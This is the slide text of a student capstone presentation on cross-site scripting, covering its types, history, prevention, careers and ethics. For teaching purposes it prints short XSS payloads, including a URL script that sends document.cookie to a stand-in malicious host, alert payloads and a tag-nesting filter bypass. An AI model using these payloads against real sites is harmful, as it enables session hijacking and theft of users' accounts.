Presentation from my degree capstone course, Frontiers in Technology

1. Cross-Site Scripting
(XSS)
Joni Hall and Daniel Tumser

2. Overview

3. Table of Contents
● Introduction
● Related Works
● Technical Aspects
● Types of XSS
o Reflected XSS
o Stored XSS
o DOM-Based XSS
o Prevention
● Careers and Jobs
● Social Impact
● Ethical Impact
● Future Expectations
● Conclusion
● References

4. Introduction
● Cross-Site Scripting (XSS) occurs when an attacker
uses a web application to gather data from a user
● Attackers inject JavaScript into an application to fool a
user to get data from them
● Every month roughly 10-25 XSS holes are found in
commercial products and advisories are published
explaining the threat.

5. Related Works
● 1995 - Netscape releases JavaScript
● 1999 - David Ross (Microsoft) publishes “Script
Injection” paper
● 2000 - Microsoft works with CERT
● 2005 - Samy Kamkar attacks MySpace
● 2006 - Cross-Site Scripting Malware popular
o port scanners, keyloggers, etc
● 2007 - XSS #1 on the Open Web Application Security
Project (OWASP) Top Ten list
● 2010 - XSS #2 on OWASP Top Ten list
● 2013 - XSS #3 on OWASP Top Ten list

6. Technical Aspects
● Leverages JavaScript to attack the user
o JS is a client-side processed scripting
language
● General aim of the attack is Session
Hijacking or Credentials Stealing
o ex. Steal user cookie & use web app
as them
● Can compromise the entire application
through users

7. Reflected XSS
● Most common form of XSS vulnerability (roughly 75% of cases)
● Vulnerability
o Improper filtering/sanitization of HTTP parameters or user input that
are processed by server-side scripts and reflected in the HTML the
client receives
● Exploit
o Crafted input by malicious user is added to a URL and sent to target
user
o http://www.something.com/thing.cgi?param=<script>document.location=“http://www.maliciousSite.com/?”
+document.cookie;</script>
● Problem
o Relies on target user having active session to hijack

8. Stored XSS
● Attack stored in application servers
● Vulnerability
o Improper user input sanitization in forms and user-created content instead of HTTP
request params
● Exploit
o Malicious script is injected into the page content viewed by other users
 ex. MySpace content (by Samy), Ebay sale listing (by Shubham Upadhyay)
 '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")</script>
● Why it’s more dangerous
o Other users will already have an active session with the application in order for malicious
code to be processed on their browser

9. XSS Illustrated

10. DOM-Based XSS
● All client-side processing, no server processing
● Vulnerability
o Improper JS data handling.
● Exploit
o Leverages Document Object Model, pulling data with AJAX, and
client-side processing
● Example
o Next slide from Open Web Application Security Project (OWASP)

11. DOM-Based XSS Example
● Expected URL in HTTP request, parameter decides default language to
display
o http://www.some.site/page.html?default=French
● Malicious URL
o http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
● Script in HTTP response from server
o document.write("<OPTION value=1>"+document.location.href.substring
(document.location.href.indexOf("default=")+8)+"</OPTION>");
o All processing references made to the Location object in the Document object for the web page in the
browser (document.location)
o Specifically to the value sent as the “default=” parameter

12. DOM-Based XSS Example Cont.
● Browser processes the script received by the server which
● injects the malicious URL parameter script into the DOM when rendering
the page, which
● executes the malicious script

13. Preventing XSS
● Recursive sanitization
o When processing a client HTTP request or user supplied data it must be sanitized
o Why recursive?
 Wrapping commonly sanitized characters or sub-strings
 ex. <scr<script>ipt> . . . </scr</script>ipt> becomes…
 <script> . . . </script>
● Properly handle Encoding/Decoding
o URL Encoding / Percent Encoding
 One method attackers used to bypass literal character filtering is to encode known
untrusted/dangerous characters (ex. %3C = ‘<’)
o HTML Encoding / Decoding
 Another method for bypassing these filters is to HTML encode those characters
injected into the document to be decoded back into scripts when the page is
rendered

14. Careers and Jobs
Job Growth Projection (2012-2022)
● Jobs in 2012 / 2022
o 141,400 /
169,900
● 10-year Growth
o +20% /
+28,500
Web Developer Pay (2012)
● Median wage (Web Devs.)
o $62,500
● vs Median wage (all occupations)
o x1.8
Web Developer

15. Careers and Jobs
Skills
● HTML
● JavaScript
● PHP
● C#
● jQuery
● CSS
Web Developer
● Java
● SQL
● Ruby on Rails
● .NET
● ASP.NET
● MySQL

16. Careers and Jobs
Skills
● Web Security and
Encryption
● Network Security
management
Penetration Tester
● Security Testing and
Auditing
● Computer Security

17. Careers and Jobs
Minimum Qualifications
● Bachelor's degree and 3 years of professional
work experience (or a master's degree)
Additional Qualifications
● Experience in
o developing web applications in Java,
Ruby or JavaScript
o OWASP or NIST 800-64
o application security assessment tools
o IT Security user groups or security
certification (CISSP, CEH, OSCP, etc.)
(MathWorks job listing)
Web Application Security Engineer

18. Careers and Jobs
Firefox Platform Engineer
Minimum Qualifications
● Experience
o writing code. College degree is not
necessary or sufficient.
o Expertise in any of C++, JavaScript, or
Python.
o Experience debugging or profiling.
Desired Skills
● C++; JavaScript; x86, x86_64, or ARM
● Experience with cryptographic signing and
verification.
● Experience with security threat models.
● and more
Platform/Browser Engineer & Security Engineer
Platform Security Engineer
Minimum Qualifications
● BS in Computer Science (or equivalent) plus 3-5
years industry experience
● Strong knowledge of C++ and JavaScript
● Strong privacy or security background
● Experience working in security or development
team
● Experience in contributing to large open source
projects is a plus
● Excellent verbal and written communication skills

19. Social Impact
● Link mistrust?
o Users still lax and ignorant
o Hackers/hacking still a very
opaque subject to most
● Train users?
o Organizations already do
o They get the training wrong
o Users are still making dumb
mistakes
 (ex. Only hover over a
link to check if the
domain matches)

20. Ethical Impact
Don’t do it(without permission)
It’s unethical and very illegal. Unless you like fines, 5-20 years in prison
(Title 18 U.S. Code § 1030(C)) and civil litigation.
Offensive/Malicious Perspective

21. Ethical Impact
● Developers have an ethical and sometimes legal responsibility to their
clients.
o XSS can result in the compromise of the entire application in addition
to client accounts
o Client compromise can disclose PII, and App compromise can mean
total data breach and network compromise
● Data breach disclosure is required by law in every state but New Mexico,
Alabama and South Dakota
o Very damaging for a company financially and to client trust
relationships
Defensive/Developer Perspective
Secure your code!

22. Future Expectations
● One estimate is that 94% of web applications are
vulnerable to XSS
o Every month roughly 10-25 XSS holes are found in
commercial products
● Jobs
o the bureau of labor statistics expects a 37%
increase for InfoSec professionals 2012-2022
● Prevention by consumer education is key!

23. Conclusion
● Almost all web applications are vulnerable to XSS
● XSS has been on OWASP’s Top Ten list for 8 years
● Repercussions to XSS?
o possible to probable jail-time and fines
● Preventing XSS?
o biggest burden lies in consumer/user education
● Jobs?
o expecting increase of 37% (2012-2022)
 all computer systems need security

24. References
1. Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook Finding and Exploiting Security Flaws. 2nd ed. Indianapolis: Wiley,
2011. Print.
2. "The Cross-Site Scripting (XSS) FAQ." 'Web and Application Security News' Web. 17 June 2015. http://www.cgisecurity.com/xss-faq.html.
3. "XSS (Cross Site Scripting) Prevention Cheat Sheet." - OWASP. Web. 17 June 2015.
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet.
4. "A Short History of JavaScript." - Web Education Community Group. Web. 17 June 2015.
https://www.w3.org/community/webed/wiki/A_Short_History_of_JavaScript.
5. "History of Cross Site Scripting." Increased Visibility. Web. 17 June 2015. http://intellavis.com/blog/?p=284.
6. "Types of Cross-Site Scripting." - OWASP. Web. 17 June 2015. https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting.
7. "Securing Your Web Browser." Securing Your Web Browser. CERT. Web. 17 June 2015. https://www.us-cert.gov/publications/securing-your-web-
browser.
8. Saxena, Prateek. "Systematic Techniques for Finding and Preventing Script Injection Vulnerabilities." Electrical Engineering and Computer Sciences
University of California at Berkeley, 29 June 2012. Web. 17 June 2015. http://www.eecs.berkeley.edu/Pubs/TechRpts/2012/EECS-2012-170.pdf.
9. Klein, Amit. "Cross Site Scripting Explained." Sanctum Security Group, 1 June 2002. Web. 17 June 2015.
https://crypto.stanford.edu/cs155/papers/CSS.pdf.
10. "Web Application Security Engineer." - MathWorks Jobs. MathWorks. Web. 17 June 2015.
http://www.mathworks.com/company/jobs/opportunities/web-application-security-engineer-14497?source=10192.
11. "Web Application Security Engineer Salary." Web Application Security Engineer Salary. Indeed. Web. 17 June 2015.
http://www.indeed.com/salary?q1=Web Application Security Engineer&l1=.
12. "Web Application Developer Salary (United States)." Web Application Developer Salary (United States). PayScale. Web. 17 June 2015.
http://www.payscale.com/research/US/Job=Web_Application_Developer/Salary.
13. "Web Developers." U.S. Bureau of Labor Statistics. U.S. Bureau of Labor Statistics, 8 Jan. 2014. Web. 17 June
2015.http://www.bls.gov/ooh/computer-and-information-technology/web-developers.htm.
14. "Penetration Tester Salary (United States)." Penetration Tester Salary (United States). PayScale. Web. 17 June 2015.
http://www.payscale.com/research/US/Job=Penetration_Tester/Salary.
15. "18 U.S. Code § 1030 - Fraud and Related Activity in Connection with Computers." 18 U.S. Code § 1030. Cornell University. Web. 17 June 2015.
<https://www.law.cornell.edu/uscode/text/18/1030>.

25. Cross-Site Scripting
(XSS)
Joni Hall and Daniel Tumser